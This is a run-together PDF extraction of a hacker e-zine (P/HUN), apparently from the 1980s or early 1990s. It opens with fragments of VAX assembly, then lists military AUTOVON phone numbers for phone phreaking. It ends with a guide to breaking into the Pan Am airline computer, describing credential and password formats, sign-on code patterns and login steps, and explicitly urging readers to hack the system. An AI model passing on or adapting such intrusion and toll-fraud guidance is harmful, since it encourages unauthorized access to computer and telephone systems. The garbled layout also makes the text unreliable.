MOVQ (R4),-(SP) PUSHL #n1 BSBB PQEXP_R3 MOVQ (R4),-(SP) PUSHL #n0-n1 BSBB PQEXP_R3
MOVQ (R5)+,-(SP) BSBW PQADD_R0 BSBW PQMUL_R2 MOVQ (R5)+,-(SP) MOVQ (R4),-(SP)
BSBW PQMUL_R2 MOVQ (R5)+,-(SP) BSBW PQADD_R0 MOVQ (R4),-(SP) BSBB PQMUL_R2
MOVQ (R5)+,-(SP) BSBW PQADD_R0 MOVQ (R4),-(SP) BSBB PQMUL_R2 MOVQ (R5)+,-(SP)
BSBW PQADD_R0 BSBW PQADD_R0 MOVQ (SP)+,@4(AP) MOVL #1,R0 RET PQEXP_R3: POPR
#^M MOVQ #1,-(SP) MOVQ 8+4(SP),-(SP) TSTL 8+8(SP) BEQL 30$ 10$: BLBC 8+8(SP),20$ MOVQ(SP),-(SP) MOVQ 8+8(SP),-(SP) BSBB PQMUL_R2 MOVQ (SP)+,8(SP) CMPZV #1,#31,8+8(SP),#0
BEQL 30$ 20$: MOVQ (SP),-(SP) BSBB PQMUL_R2 EXTZV #1,#31,8+8(SP),8+8(SP) BRB 10$ 30$:
MOVQ 8(SP),8+8+4(SP) MOVAQ 8+8+4(SP),SP JMP (R3) u=0 v=u+4 y=u+8 z=y+4 PQMOD_R0:
POPR #^M CMPL v(SP),#-1 BLSSU 10$ CMPL u(SP),#-a BLSSU 10$ ADDL2 #a,u(SP) ADWC
#0,v(SP) 10$: JMP (R0) PQMUL_R2: POPR #^M MOVL SP,R2 PUSHL z(R2) PUSHL v(R2) BSBB
EMULQ BSBB PQMOD_R0 BSBB PQLSH_R0 PUSHL y(R2) PUSHL v(R2) BSBB EMULQ BSBB
PQMOD_R0 PUSHL z(R2) PUSHL u(R2) BSBB EMULQ BSBB PQMOD_R0 BSBB PQADD_R0 BSBB
PQADD_R0 BSBB PQLSH_R0 PUSHL y(R2) PUSHL u(R2) BSBB EMULQ BSBB PQMOD_R0 BSBB
PQADD_R0 MOVQ (SP)+,Y(R2) MOVAQ Y(R2),SP JMP (R1) EMULQ: EMUL 4(SP),8(SP),#0,-(SP)
CLRL -(SP) TSTL 4+8+4(SP) BGEQ 10$ ADDL2 4+8+8(SP),(SP) 10$: TSTL 4+8+8(SP) BGEQ 20$
ADDL2 4+8+4(SP),(SP) 20$: ADDL2 (SP)+,4(SP) MOVQ (SP)+,4(SP) RSB PQLSH_R0: .ENABLE LSB
POPR #^M PUSHL v(SP) PUSHL #a BSBB EMULQ ASHQ #32,Y(SP),Y(SP) BRB 10$ PQADD_R0:
POPR #^M 10$: ADDL2 u(SP),y(SP) ADWC v(SP),z(SP) BLSSU 20$ CMPL z(SP),#-1 BLSSU 30$
CMPL y(SP),#-a BLSSU 30$ 20$: ADDL2 #a,y(SP) ADWC #0,z(SP) 30$: MOVAQ Y(SP),SP JMP (R0)
.END =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = P/HUN
Issue #3, Volume 2: Phile #4 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-= The Automatic Voice Network (AUTOVON) Outline PART I --------------------
-------------------------------- Typed by: DareDevil P/HUN Magazine Inc. I am back from my long trip
from London which turned out to be very intresting. I met a couple of Hackers and Phreakers
who were very willing to share information with me. From what they say Hacking European
Computers seems to be an easy task. Anyway..... Heres something for you Silver Boxers. Hope
this helps a little. The next 2 parts will continue in the later issues of P/HUN. o-----------------------
---------------------------------------o (To reach these installations from "DoD Numbers Only")
AUTOVON Listing Information Dial "0" AUTOVON Access - Dail "8" Listen for the tone,then the
AUTOVON Number --------------------------------------------------------------------- INCOMING AUTOVON
CODES ---------------------- COMMERCIAL AUTOVON | COMMERCIAL AUTOVON -----------------------
--------------|------------------------------------- 227 Exchange 287 Plus four digits | 437 Exchange 364
Plus four digits 238 " 251 " | 475 " 335 " 272 " 285 " | 490 " 356 " 274 " 284 " | 576 " 291 " 282
" 292 " | 653 " 294 " 284 " 251 " | 692 " 222 " 285 " 356 " | 693 " 223 " 295 " 295 " | 694 " 224
" 325 " 221 " | 695 " 225 " 355 " 345 " | 696 " 226 " 373 " 243 " | 697 " 227 " 394 " 290 " | 746
" 286 " 427 " 291 " | 756 " 289 " 433 " 288 " | 763 " 293 " 463 " 296 " | 767 " 297 " -------------------------------------+------------------------------------- AUTOVON Access to The Pacific European-
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 11/50
Carribean Area IS NOT available through the DoD Exchanges. Theses calls must be placed
through the appropriate Military Switchboard serving your activity or by COML means.
ALABAMA ------- Adj Gen Natl, Montgomery ........................................ 363-72XX Oper Asst. 363-
7210 Air Force Air Univ, Maxell AFB................................... 875-XXXX Info Oper. 875-1110 Oper
Asst. 436-3700 Air Natl Gd 117th Tac Recon Gp,Birmingham........................ 694-2XXX Oper
Asst. 694-2210 187th Tac Recon Gp, Montgomery.......................... 742-9XXX Oper Asst. 485-9210 232nd Mob Comm Sqd, " ................................. 485-XXXX Oper Asst. 742-9210 Anniston
Army Depot.............................................. 571-XXXX Oper Asst. 571-1110 Army Msl Cmd,
Redstone Arsl...................................... 746-XXXX Info Oper. 746-0011 Coast Guard Avn Spt Tng
Cen, Mobile.............................. 436-3635 Def Contr Admin Svcs Mgt Area,
Birmingham........................ 340-1XXX Oper Asst. 340-1000 Fort McClellan,
Anniston......................................... 865-XXXX Oper Asst. 865-1110 Gunter AFB,
Montgomery........................................... 446-XXXX Oper Asst. 446-1110 Maxwell AFB, "
.................................................. 875-XXXX Info Oper. 875-1110 Mil Tfc Mgt Cmd (MTMC) EA
Mob Det Gulf Outport Mobile............ 436-3830 Outport Mobile..................................................
746-XXXX Redstone Arsl,HUntsville......................................... 746-XXXX Info Oper. 746-XXXXU.S Property & Fiscal Ofc (USPFO) Natl Gd, Montgomery............ 363-7316 ALASKA ------ Adj
Gen Natl Ge, Anchorage................................... 317-626-1299 Mil Actvities , Neklason
Lake................................ 317-950-1211 Alaska Switch,Neklason Lake.................................. 317-
950-1211 Cmdr in C Alaska (CINCAL), Elmendorf AFB..................... 317-552-3100 Oper Assit.
317-753-2228 Coast Guard COMCOGARD 17 Hq , Juneau......................... 317-388-7XXX Oper
Assit. 317-388-7011 Coast Guard Kodiak........................................... 317-487-5XXX Oper Assit.
317-487-5888 Def Comm Agcy,Alaskan Region(DCA-AL) Elmendorf............... 317-552-XXXX
Oper Assit. 317-552-1110 Commander.............................................. 317-943-1212 Def
Commercial Comm Ofc,Alaska,Elmendorf AFB........... 317-552-3132 Defense Fuel
Region,Elmendorf AFB............................ 317-552-3760 Eielson AFB,
Fairbanks....................................... 317-37X-XXXX Info Oper Only. 317-372-1191 Elmendorf
AFB,Anchorage...................................... 317-552-XXXX Info. 317-552-1110 Oper Assit. 317-552-
1110 Fed Avn Agcy - Alaskan Rdn Hg, Anchorage..................... 317-552-XXXX Oper Assit. 317-
552-1110 Comm Con Cen............................................ 317-552-1212 Fort Greely,Delta
Junction................................... 317-87X-XXXX Info Oper. 317-872-1113 Oper Assit. 317-864-
0121 Fort Wainright, Fairbanks.................................... 317-35X-XXXX Info Oper. 317-353-9113
Oper Assit. 317-353-9121 Nav Actvities,Adak........................................... 317-592-XXXX Oper
Assit. 317-592-0111 US Property & Fiscal Ofc (USPFO) Natl Gd, Ft Richardson...... 317-862-8116
ARIZONA ------- A Comm-Hq,Ft Huachuca........................................... 879-XXXX Oper Assit. 879-
0111 USACC HQS EAC............................................... 626-1720 Adj Gen Natl Gd,
Phoenix........................................ 853-8710 Air Natl Gd 161st Mil Airlift Gp,
Phoenix....................... 853-8710 Oper Assit. 853-9210 David Monthan AFB,
Tucson....................................... 361-XXXX Oper Assit. 361-1110 Tac Cmd
Post................................................ 626-1655 Def Contr Admin Svcs Mgt Area,
Phoenix.......................... 940-XXXX Oper Assit. 940-1110 Fort Huachuca, Sierra
Vista..................................... 879-XXXX Oper Assit. 879-0001 Luke
AFB,Glendale............................................... 853-XXXX Oper Assit. 853-1110 Cmd Post Duty
Officer...................................... 727-3950 " ...................................... 626-1690 Marine Corps Air
Sta, Yuma...................................... 951-XXXX Oper Assit. 951-3011 Mil Acft Star & Disp
Cen,Tucson................................. 361-XXXX Oper Assit. 361-1110 Natl Gd State Maint Ofc,
Phoenix................................ 853-8810 US Property & Fiscal Ofc (USPFO) Natl Gd,Phoenix............... 853-8821 Williams AFB, Chandler.......................................... 474-XXXX Oper
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 12/50
Assit. 474-1011 Yuma Proving Grounds............................................ 899-XXXX Oper Assit. 899-
1110 After Hours. 899-2020 1st Cbt Eval Gp Det 2 (SAC) Holbrook............................ 626-3430
ARKANSAS -------- Adj Gen Natl Gd, Little Rock.................................... 731-5200 Air Natl Gd
188th Tac Recon Gp, Ft Smith........................ 962-8XXX Blytheville
AFB................................................. 721-XXXX Oper Assit. 721-1110 Fort Chaffee,Ft
Smith........................................... 962-2XXX Oper Assit. 962-2111 Little RockAFB................................................. 731-XXXX Oper Assit. 731-1110 Pine Bluff
Arsl................................................. 966-3XXX Oper Assit. 966-3798 US Property & Fiscal
Ofc(USPFO) Natl Gd,Little Rock............. 731-5253 CALIFORNIA ---------- Adj Gen Natl Gd,
Sacramento..................................... 466-6531 Air Force Aero Sta, McClelland
AFB.............................. 730-3760 Air Force Contr Mgr Div AFSC, Los Angeles AFS...................
833-1837 Oper Assit. 833-1110 Air Force Flt Test Cen,AFSC, Edwards AFB........................ 527-
XXXX Oper Assit. 527-0111 Air Force Satl Comm Fac Hq, Los Angeles......................... 833-XXXX
Oper Assit. 833-1110 Air Force Satl Test Ctr, Sunnyvale.............................. 359-3XXX Oper Assit.
359-3110 144th Air Def Wg, Fresno.......................... 949-9XXX Oper Assit. 949-9210 146th Mil
Airlift Wg, Van Nuys.................... 873-6XXX Oper Assit. 873-6310 148th Comm Sqd,Compton........................... 898-1895 149th Comm Sqd, Highlands......................... 633-2582
162nd Comm Gp, N Highlands........................ 633-2582 216 Equip & Inst Squd,
Hayward.................... 462-5637 222nd Mob Comm Sqd, Costa Mesa.................... 833-0459
234th Mob Comm Sqd, Hayward....................... 462-1746 America Forces Radio & TV Svc, Los
Angeles...................... 898-1746 Armed Forces Reserve Ctr, Los Angeles........................... 972-
8XXX Oper Assit. 972-8011 Army Audit Agcy Western Region, Sacramento...................... 839-
2241 Oper Assit. 839-1110 Ballistic Sys Div Af Sys Cmd, Norton AFB........................ 876-XXXX
Oper Assit. 876-1110 Beale AFB, Marsville............................................ 368-XXXX Oper Assit.
368-1110 Camp Pendelton Marine Corps Base,Oceanside...................... 365-XXXX Oper Assit.
365-0111 Castle AFB, Merced.............................................. 347-XXXX Oper Assit. 347-1110
Centerville Beach Nav Fac, Ferndale............................. 896-3381 Coast Guard COMCOGARD 11
Hq, Long Beach......................... 360-7961 12 Hq,(RCC Only), San Francisco................... 730-
3471 Montery......................................................... 629-1561 Cmdr Submarine Flottilla Five, San
Diego........................ 933-XXXX Oper Assit. 933-1011 Def Conrt Admin Svcs Reg Svcs Reg/Mgt
Area, Los Angeles......... 833-XXXX Info Oper. 833-2226 Oper Assit. 833-1110 Def Contr Admin
Svcs Mgt Area, Santa Ana........................ 873-2XXX Oper Assit. 873-2700 San
Diego.......................................... 542-XXXX Oper Assit. 524-0111 Van
Nuys........................................... 972-3XXX Info Oper. 972-3319 San
Francisco...................................... 466-9XXX Info Oper. 466-9500 Defense Depot,
Tracy............................................ 462-9XXX Oper Assit. 462-9110 Def Fuel Region West San
Pedro.................................. 833-2876 Def Language Institute, Presidio of Monterey....................
929-XXXX Oper Assit. 929-1110 Def Pers Spt Cen, Alameda....................................... 686-3006
Def Manpower Data Center, Monterey.............................. 878-2951 Edwards
AFB..................................................... 527-XXXX Info Oper. 527-0111 FAA Los Angeles Air Rt Trc
Con Cen, Palmdale.................... 898-1290 FAA Oakland Air Rt Trf Con Cen,
Fremont......................... 730-1595 Flt Air Con & Surv Fac (FACSFAC) TCC/OC Only, San
Diego......... 727-3925 Flt Anal Cen, Corona............................................ 933-XXXX Oper Assit.
933-0111 Flt Anti-Sub Warefare Sch, San Diego............................ 524-XXXX Oper Assit. 524-
0111 Fort Irwin, Barstow............................................. 470-XXXX Oper Assit. 470-0111 Fort
Mason, San Francisco....................................... 586-XXXX Oper Assit. 586-1110 Fort Ord,
Monterey.............................................. 929-XXXX Oper Assit. 929-1110 George AFB,Victorville......................................... 353-XXXX Oper Assit. 353-1110 German Mil Rep to
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 13/50
USA/Cent Area, Long Beach NS.................. 360-0111 Letterman Genral Hospital, San
Francisco........................ 586-XXXX Oper Assit. 586-2231 Los Angeles
AFS................................................. 833-XXXX Oper Assit. 833-1110 Info Oper. 989-1780 MLP
Oper. 838-XXXX March AFB, Riverside............................................ 947-XXXX Oper Assit. 947-
1110 Marine Corps AirSta, El Toro.................................... 524-XXXX Oper Assit. 997-3011 Rctg
Depot, San Diego........................ 524-XXXX Info Oper. 524-1011 Log Sup Base,Barstow........................ 282-XXXX Oper Assit. 282-0111 Marine Corps Air Ground Combat 29
Palms.................... 952-5XXX/6XXX Oper Assit. 952-6000 Mather AFB,
Sacramento.......................................... 828-XXXX Oper Assit. 828-1110 McClellan AFB,
Sacramento....................................... 633-XXXX Oper Assit. 633-1110 AUTODIN Tech Con,
Sacramento..................... 730-1493 MCS Office Long Beach........................................... 360-
6645 Mil Tfc Mgt Cmd (MTMC) WA HQ Oakland Army Base.................. 859-XXXX Oper Assit.
859-0111 WA MOT Bat Area.................................. 859-XXXX WA S/CA Outport SAn Pedro OPER
Asst.............. 853-1650 MTMC WA MATCO Norton AFB CA...................... 876-XXXX MTMC WA
MATCO Norton AFB OPER Asst............... 876-1110 MTMC WA MATCO Travis AFB
CA...................... 837-XXXX MTMC WA MATCO Travis AFB OPER Asst............... 837-1110 NatlGd State Maint Ofr, Sacramento............................. 466-6571 Oper Assit. 466-6605 Natl
Parachute Test Range, El Centro............................ 958-8XXX Oper Assit. 958-8212 Non-Duty
Hours. 958-8547 Nav Air Sta, Alameda............................................ 686-0111 Imperial
Beach................................... 951-0111 Lemoore.......................................... 949-0111
Miramir.......................................... 577-XXXX Oper Assit. 577-1011 Moffett Fld,
Sunnyvale........................... 462-0111 COM NAS North Island............................. 951-0111 Nav
Amph Base - Coronado, San Diego............................. 577-XXXX Oper Assit. 577-2011 Nav
Comm Sta, NavOp Radio and Tele(NORATS), San Diego........... 958-3XXX Oper Assit. 958-3011
San Francisco, Stockton........................... 466-7444 " " Tech Con, Stockton................. 730-1581
Nav Const Bn Cen, Port Hueneme.................................. 360-XXXX Oper Assit. 360-4001 Cdmr
Nav Base, San Diego.......................... 958-3011 Nav Hosp, Long
Beach............................................ 873-9XXX Oper Assit. 873-9011
Oakland........................................... 855-XXXX Oper Assit. 855-5000 San
Diego......................................... 522-6011 OIC of Navy Const, Mare Island..................................
253-XXXX Oper Assit. 253-2101 Mare Isl Vallejo.................................. 253-XXXX Oper Assit. 253-
0111 Nav Ocean Sys Ctr............................................... 553-XXXX Oper Assit. 533-0111 Nav Shp
Wpn Sys Engr Sta, Port Hueneme.......................... 360-XXXX Oper Assit. 360-4711 Nav Sta, Long
Beach............................................. 360-XXXX Oper Assit. 360-0111 Nav Sta, San
Diego.............................................. 958-XXXX Oper Assit. 958-0111 Nav Sta, Treasure Island,
San Francisco......................... 869-XXXX Duty Off 869-6233 Oper Assit. 869-6411 Non Duty Hrs.
869-6233 Nav Sup Cen, Oakland............................................ 836-XXXX Oper Assit.836-0111 Info
Oper 836-4011 San Diego........................................ 522-XXXX Oper Assit. 522-1011 Nav Tng
Cen, San Diego.......................................... 524-XXXX Oper Asst. 524-0111 Nav Tng Cmd Pac
Fleet, San Diego................................ 524-XXXX Oper Assit. 524-0111 NAVSURFPAC, San
Diego........................................... 958-9XXX Oper Assit. 958-9101 South Pac, Moffet
Fld........................................... 462-XXXX Oper Assit. 462-0111 Nav Wpns Cen China
Lake......................................... 437-XXXX Oper Assit. 437-9011 Nav Wpns Sta,
Concord........................................... 253-5111 Nav Wpns Sta Steal
Beach........................................ 873-7XXX Oper Assit. 873-7000 Navy Post Grauduate School,
Monterey............................ 878-XXXX Oper Assit. 878-0111 Norton AFB, San
Bernardino...................................... 876-XXXX Oper Assit. 876-1110 AUTODIN TechCon................................. 898-3944 Oakland Army Base............................................... 859-XXXX
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 14/50
Oper Assit. 859-0111 Pacific Msl Test Cen, Point Mugu................................ 351-XXXX Oper
Assit. 351-1110 Pasadena Fed Cen................................................ 879-5011 Point Sur Nav Fac,
Big Sur...................................... 629-1470 Presidio of San Francisco....................................... 586-
XXXX Oper Assit. 586-1110 Rio Vista....................................................... 586-5837 Riverbank
Army Ammo Plt......................................... 466-4100 Sacramento Air Log
Cen.......................................... 633-XXXX Oper Assit. 633-1110 Sacramento ArmyDepot........................................... 839-XXXX Oper Assit. 839-1110 Sharpe Army Depot,
Lathrop...................................... 462-2XXX Oper Assit. 462-2011 Sierra Army Depot,
Herlong...................................... 830-9XXX Oper Assit. 830-9910 Space & Msl Sys Org, Los
Angeles................................ 833-XXXX Oper Assit. 898-1780 Travis AFB,
Fairfield........................................... 837-XXXX Oper Assit. 837-1110 22nd AF Tac Cmd
Post............................ 730-1410 22nd AF Tac PBX................................. 869-3480 USPFO Natl
Gd, San Luis Obispo.................................. 879-9201 Oper Assit. 878-9211 Vanderberg AFB,
Lompox.......................................... 27X-XXXX Oper Assit. 276-1110 West Div Nav Fac Engr Cmd,
San Bruno............................ 859-XXXX Oper Assit. 859-7111 6th Army Presidio of San
Francisco.............................. 586-1110 15th Air Force wea Spt Unit, March AFB..........................727-1647 END OF PART 1 DDDDDDDDDDDDDD The file is getting rather long and dont want to
bore people with long lists of numbers therefore, Part ][ & Part ]I[ will be on later issues of
P/HUN Online Magazine. DareDevil at P/HUN Magazine Inc. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = P/HUN Issue #3, Volume 2: Phile #5 of 11 = =-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X X / / The Pan Am Airline Computer (c)
1994 "PART A" X X --------------------------------------------- / / X X By Red Knight / / X X A P/HUN
Magazine Incorporation Productions. / / X
X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/ Introduction: ------------- Ever
wondered how the airline computers work? Well this article will inform you as to various
information,commands etc. The more you know about them the more favors you can ask of
them. I will go into details on how they go about booking actual flights so you get an
understanding on how its done. The article will have actual outputs etc and explained in depth.
The best way to explain to first understand the PANAMAC computer. Then you can go on and
hack the main Pan Am computer because all the commands are the same. What is PANAMAC?:
---------------- PANAMAC are computers Pan Am's Sales Agent use for booking flights, answering
our various questions on arrivals,departures,visa etc.This is only a small percentage of the
questions.PANAMAC is full of info. Where can you find answers to the these questions: - What
is a DH7 aircraft - How many passengers were their in flight P2308 last month - What will be
the bus fair when traveling from Mombasa to Nairobi in Kenya - What does SXR represent -
Information on carrying pets - Where does one go for yellow fever shot in Kansas or anywhere
in USA - What is the departure tax from from anywhere in the world - How many ciggerates is
one allowed to take from USA to Pakistan - Where to stay - Which hotels? - Weather
conditions in a particular country - Flight delays Get my drift? Well the above questions can be
answered using the PANAMAC. PANAMAC is manufactured by ICOT. Logging On to The Main
Pan-Am Computer: (Not the PANAMAC )
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD [This
particular info on logging on was acquired from a Pan-Am employee]
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDD This is the most hardest part of all. While logging on to the Pan Am computer
you will not see any type of an identifier. These system use E,7,1 characterists. Enter asfollows: ".Nodes" or ".N" then the Node Identifier: The Node identifier:
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 15/50
DDDDDDDDDDDDDDDDDDDD This part of info will contain the NPA a person is calling from
and then followed by a 7 digit access number in which last two are the state abb. An example
would be: 71811355NY Its a high possiblity that the "11355" could be a zip code The Person ID:
DDDDDDDDDDDDDD After the Node Identifier enter: .PI [ (NPA,8 Alpha Numeric Chracters
which first being a letter) Password DDDDDDDD The password is assigned to the employees
which is supposed to be 6 to 8 characters alphanumeric with first being usually "P" EnterPassword using ".P" or ".PASSWORD" (No echo) (After this you will get a long pause for about 1
min) Then if you guessed wrong then it will log you off. Your in!!! DDDDDDDDDD If you have
made it so far then you are a hell of Hacker and you have my full respect. After you have
entered correct information then you will get a message like this: Pan Am Airlines (4854.00PA)
Unauthorized Access will lead to a prosecution. > ( This is the SOM Prompt) (After that you will
get a "SOM" prompt. Then from here on your home free. The SOM is there for you. Almost all
the commands in the PANAMAC will work on their Main Computer.
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDD ** NOTICE ,READ CAREFULLY ** >From here on the article will deal
with PANAMAC Airline Computer which your sales agent uses to book you a flight and give youinformation. You wont be able to call these up tho, but rather use the infomation provided
here when you hack the Main Pan-Am Airline Computer. (Process is described above) I repeat,
all the commands are on The PANAMAC will work on the Main Computer.
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDD Basic PANAMAC hardware: ----------------------- A set consists of a
display screen, standard type writer key board with row of function keys along the top. There
will also be a block of keys to the right of the main key board and another block of keys to the
far right. I will explain almost all the keys on the board.The keyboard is a little different from
the regular IBM keyboards. Basic Layout of a PANAMAC keyboard
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
____________________________________________________________________________ |
| | +----------------------------------------------------------------------+ | | | F U C T I O N K E Y S | | | +------
----------------------------------------------------------------+ | | | | +---------------------------------------+ +------
---+ +---------------+ | | | | | cursor | | | | | | | | keys | | | | | | | | Next | | PF 1-30 | | | | Basic
Keyboard with twin functions | | Part | | 15 keys | | | | invoked by ALT + [Key] | | Delete | | |
| | | | | etc. | | | | | | | | | | | | | +---------------------------------------+ +---------+ +---------------+ |
|___________________________________________________________________________|
Here is a list that are used the most.The rest that I did not go into details are almost never
used. (They can be invoked by using the ALT plus the approriate key) For eg. The (CALC) - Use
to get into calculator mode. +------+ | Z | ALT + +------+ ----> CALCULATOR MODE | CALC | +------
+ (CHNG SCRN) - Changes from one screen to the second screen. (CHANGE) - Used when
changing name entries. (RESET) - to reset the system.Eg. IF you are in the CALC mode to use
this return to regular mode. (IGN) - Used to ignore any transaction made like when you enter
something for example in the PNR (Passenger Name & Record) and you dont wish to save the
current format you would use the IGN. (XITN) -Cancel all itinerary in a PNR. The intinerary is
the record of a flight (ARNK) - Arrival not known. (ET) - End Transaction. This store the the
edited PNR. (GFAX) - General FACTS. Info on passengers that Pan Am & other airlines need to
know. (FAX) - Host FACTS. Info on passengers that only Pan Am needs to know. (RMKS) -
Remarks field to store misc info. (RCVD) - Received filed. Name of person who made the
booking. (SEG) - Leave an open segment for a passenger who may want to return at an
unknown date but is sure that he/she will travel by Pan Am. (IAS) - The "/" key is on thebottom of the keyboard. The letters "IAS" stand for Insert After Segement (will be used later in
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 16/50
the article). (NAME) - Name of persons traveling eg. -3smith/sethmr/danmr/loydmr this is an
eg. of an entry made if three person seth, dan, loyd were travelling a family obviosly having the
same last name. (DSPL) - Display a PNR, history, itin etc. (CLEAR) - To clear the field that you
are working in (To clear all fields press ALT - CLEAR)..Doesn' delete any info. (ALARM) - When
you hear a "beep" use ALT-R (alarm) to clear the alarm. (SOM) - Start of message.You will
receive a new start of message. (CLICK) - A toggel to switching on & off of the blinking of thecursor. (RDUC) - Reduce fares.This is to view fares on senior citizen, students etc. (ERASE) - A
sort of a DEL key to delete the last character. (SHIFT) - Used to toggle the second mode of the
key. (CALC) - To get to the calculator mode. (END-I) - Used to display domestic fairs. (END
ITEM) - Used while inputing many name entries;Instead of using the . (ENTER) - Self
explanatory. (EDIT FRMAT) - To transpose a copy from one field so another. (NEXT PART) -
Move the cursor from one field to another. (INSERT CHAR) - Insert a character. (DELETE CHAR)
- Erase a character between a word and moves up the rest of the word. (INSERT LINE) - To
Insert a line. (DELETE LINE) - Self Exp. but cursor remains there. (PART) - Just like the cursor
keys UP,DOWN,RIGHT,LEFT. (PF10) - To direct a command to the upper left field. (PF11) - " " " "
" " " right ". (PF13) - " " " " " " bottom left ". (PF14) - " " " " " " " right ". Part II DDDDDDDSOM/CURSOR: ---------- When they first start, the screen is divided into 4 parts (dotted line line
sepating the four fields.Each of those four field contains the SOM (this is PANAMAC
prompt).The SOM looks like an equilateral triangle pointing towards the right.The cursor could
be in any field or left of when last used. In this article the I have characterized the SOM as ">"
Now to move to the next field one would use the "NEXT PART" key. SINNING IN (LOGGING IN):
------------------------ In order to use the PANAMAC the all sales agents have to sine in. Each user
is assinged 2 things: 1) COLLINS SINE: - This is needed to sine in to the phone. 2) PANAMAC
SINE: - This is needed to access the computer. COLLINS SINE: ------------- The COLLINS SINE is a
code used to access the phone system to receive calls and make calls.This serves as an
unlocking device The collins sine consists of 9 chracters.The first is always an asterisk the next
two are CAPITALS letters almost always (SI) Here are some examples of COLLINS SINEs :
*SI340450 *SI409321 *SI345090 *SI430092 By sinning into the telphone is exactly what I
mean. One would enter in thru the touch tones (NOT THRU THE COMP) So therefore *SI30450
one would would enter the * ,74 for SI then the rest of the #s. Heres how the telephone key
PAD looks : _________________________________________________________________ |
____________________________ _______ _______ _______ | | | | | | | REL | |EMGY | | CW
| | | | | ABC | DEF | |_____| |_____| |______| | | | 1 | 2 | 3 | |DAIL | | |
|________|________|________| |_____| | | | | | | |SUPV | | | | GHI | JKL | MNO | |_____|
| | | 4 | 5 | 6 | | | |________|________|________| | | | | | | | | | PQR | TUV | WXY | | | | 7
| 8 | 9 | | | |________|________|________| _____ | | | * | 0 | # | | IN | | |
|________|________|________| |_____| _____ | | | AVI | | RPT | | | |_____| |_____| |
|_______________________________________________________________| Key Pad: -------
- IN - The IN key on the telephone key pad serves as a hold button the key will blink when
customer is on hold. AVI - (Available) is depressed when the sales agent is available for the
next call. RPT - [Unknown] REL - (Release) Pushed when the sales agent doesn't want to be
instantly available for the next call. Depress AVI before releasing call. DAIL - (out dail) - Depress
the key and dial out. Method : 1) When asking for help 7714,7721,7713 2) Pantel (Used to call
up the Pan Am airport) - 8XXX-XXXX 3) Local 212 Calls 9XXX-XXXX. 4) All others 8XXX-XXX-XXXX
SUPV - When the sales people ask for assistance EMGY - This key is an important one. Suppose
some one makes a bomb threat this key is immediatly depressed and the conversation is
recorded in another room. The sales agents have been taught to keep them online as much asthey can. CW - Will be used for Call Waiting in the future. PANAMAC SINE: ------------- The
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 17/50
PANAMAC SINE in consists of 10 characters with BSIA (always) the first four. The next four are
all numbers and the last 2 are letters which could be anything. Examples: BSIA0290KI
BSIA8534PO BSIA3309DS Procedure: ---------- This is the procedure they follow: 1) Sine in to the
telephone - *SI 2) Sine out - *SO ( the SO stands for sining out) 3) Sine in the computer -
[PAMAMAC SINE] 4) Sine into the telephone Now the sales agent is ready to receive calls.
General Information Index: -------------------------- PANAMAC contains most of the technicalinformation that is needed by the the service representatives. To display (G)eneral
(I)nformation (I)ndex you would input: >KIINF followed by the first letter of the subject
desired. OUTPUT: KIABLA - Albany Airport Info KIATLA - Airport at Atlanta Georgia KIAULA
KIABWA KIBOSA : etc ... : KIZAQE By just entering KIINF you would get all the KIINF Index from
A to Z. You can take it as if the KIINF is a root directory and its divided into thousands of
subdirectories. The letter KI actually stands for Key In followed by the INF for information.
For example if you wanted to display general information on car rentals it would like this:
>KIINFC (Type at the SOM) The system will list car-rental related files.Then all they do is
retrieve it. Station Information File (CITY INDEX) ------------------------------------ PANAMAC also
contains information about specific cities.To display the Index for a particular city, one is ableto Key In (KI) and type in the three letter city code. So lets say you wanted some information
about Atlanta : Type in: >KIATL This will display all of the files concerning Atlanta. Now to
display a particular file to view one would enter KIATL plus the the letter code of the file name.
Therefore if you wished to view the information on airports in Atlanta enter: >KIATLA you will
have a screen filled with all sorts of information about the Airports in Atlanta. Examples of
some Catagories of G.I.N ------------------------------------ Index Help On ----- ------- KISKDE - What
type of Aircraft is an AB3 ? KIXXKU - What is the City Code for Kuala Lampur ? KICCCG - What is
